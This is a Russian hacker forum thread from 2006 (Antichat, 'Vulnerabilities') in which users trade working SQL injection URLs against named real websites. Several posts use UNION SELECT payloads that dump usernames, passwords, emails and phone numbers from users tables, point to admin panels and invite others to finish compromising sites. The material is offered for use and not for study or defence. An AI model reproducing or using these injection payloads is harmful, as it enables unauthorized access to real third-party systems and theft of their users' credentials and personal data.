ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 15.10.2006, 01:38
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Не знаю как у Вас, а у нас одна из самых распространненых станций:
radiorecord.ru/news/?id=-327%20union%20select%20USER()/*
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием

  #72  
Старый 16.10.2006, 02:25
Аватар для pop_korn
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

рейтинг казино )

_http://www.casinoratgeber.com/index.php?bid=-3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18+
 
Ответить с цитированием

  #73  
Старый 18.10.2006, 09:55
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

_http://dosug.nu/blockcomment.htm?idblock=1'+or+'1'='1+order+by+1--
 
Ответить с цитированием

Nobody Shells & MySQL inj, пользуемся
  #74  
Старый 18.10.2006, 17:23
Аватар для corsp_puttrider
corsp_puttrider
Новичок
Регистрация: 16.10.2006
Сообщений: 18
Провел на форуме:
48695

Репутация: 17
По умолчанию Nobody Shells & MySQL inj, пользуемся

ht_tp://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-49+union+select+null,CONCAT(username,CHAR(45,62),u ser_password,CHAR(32,45,62,73,68,61,32),user_id),C ONCAT(user_email,CHAR(32,38,32),user_website)+from +phpbb_users/*

Дырку поправили :-(

-
Шеллы запрещены!
/[m0nzt3r/]

Последний раз редактировалось corsp_puttrider; 19.10.2006 в 16:37..
 
Ответить с цитированием

Продолжение к Kazanova
  #75  
Старый 18.10.2006, 19:40
Аватар для corsp_puttrider
corsp_puttrider
Новичок
Регистрация: 16.10.2006
Сообщений: 18
Провел на форуме:
48695

Репутация: 17
По умолчанию Продолжение к Kazanova

ht~tp://www.kazanova.com.ua/product.php?id=-2+UNION+SELECT+1,2,CONCAT(CHAR(64,64),user,CHAR(58 ,58),password,CHAR(58,58),name,CHAR(58,58),surname ,CHAR(58,58),id,CHAR(58,58),sex,CHAR(58,58),email, CHAR(58,58),phone,CHAR(58,58),city),4,5,5,7,8,9,1, 1,1,1,1+from+users/*
админка по адресу /admin
 
Ответить с цитированием

  #76  
Старый 19.10.2006, 08:44
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Весь сайт в багах.
Кто доламает отпишите в асю.
Если я 1 не буду


_http://zloy.org/news_f1%20union%20select%201.html

_http://zloy.org/news_f1'%20union%20select%201,2,3,4,5,6,7,8,9,1,2, 3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9, 1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7, 8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5, 6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,9,9,9, 1,2,3,4.html
 
Ответить с цитированием

Вот еще только не смог подобрать имя базы
  #77  
Старый 19.10.2006, 16:27
Аватар для corsp_puttrider
corsp_puttrider
Новичок
Регистрация: 16.10.2006
Сообщений: 18
Провел на форуме:
48695

Репутация: 17
По умолчанию Вот еще только не смог подобрать имя базы

http://www.chicagomediaaction.org/news.php?id=-481%20union%20select%201,2,3,4,5,6,7,8/*
 
Ответить с цитированием

Скуль(правда не смог найти имя таблицы)
  #78  
Старый 19.10.2006, 18:25
Аватар для corsp_puttrider
corsp_puttrider
Новичок
Регистрация: 16.10.2006
Сообщений: 18
Провел на форуме:
48695

Репутация: 17
По умолчанию Скуль(правда не смог найти имя таблицы)

http://www.multidmedia.com/news/news.php?id=-63%20union%20select%201,2,3,4,5/*
 
Ответить с цитированием

  #79  
Старый 20.10.2006, 09:58
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

loccitane.com Все движки разные но все бажные так держать админы.

_http://www.loccitane.com.au/product/categoryList.asp?mainUsageName=FRAGRANCE&subUsageI d=10%20or%201=@@version--

_http://www.loccitane.ru/category.php?id=-1+union+select+1,2,concat(login,char(58),password) ,1,5+from+users+where+id=134/*
 
Ответить с цитированием

  #80  
Старый 20.10.2006, 16:54
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

27 столбцов=)
Цитата:
_http://www.standardtvandappliance.com/home/products_detail/index.php?prodid=1327%20union%20select%201,2,3,4,u ser(),6,7,8,9,10,11,12,13,14,15,16,VERSION(),18,19 ,20,21,22,23,24,25,26,27/*
А вот еще одна на этом же сайте)
Цитата:
http://www.standardtvandappliance.com/home/subcategory/index.php?subcatid=63%20union%20select%201,USER(), 3,4,5,6,7/*
ВОТ еще 2 инекции на сайте

www.zot.ru

Цитата:
http://www.zot.ru/index.php?prodid=1+and+1=8%20union%20select%201,na me,3,4,id,6,7,art,9%20from%20cat/*
и
http://www.zot.ru/action.php?id=1+and+1=1+union%20select%201,2,3,4,5 ,6,7,8,9,10,11,12,13+from+cat/*

все колонки которые мне известны и всем доступны:
id,name,art,typename,descr,acti,cert,spec,status

Последний раз редактировалось m0nzt3r; 20.10.2006 в 18:41..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ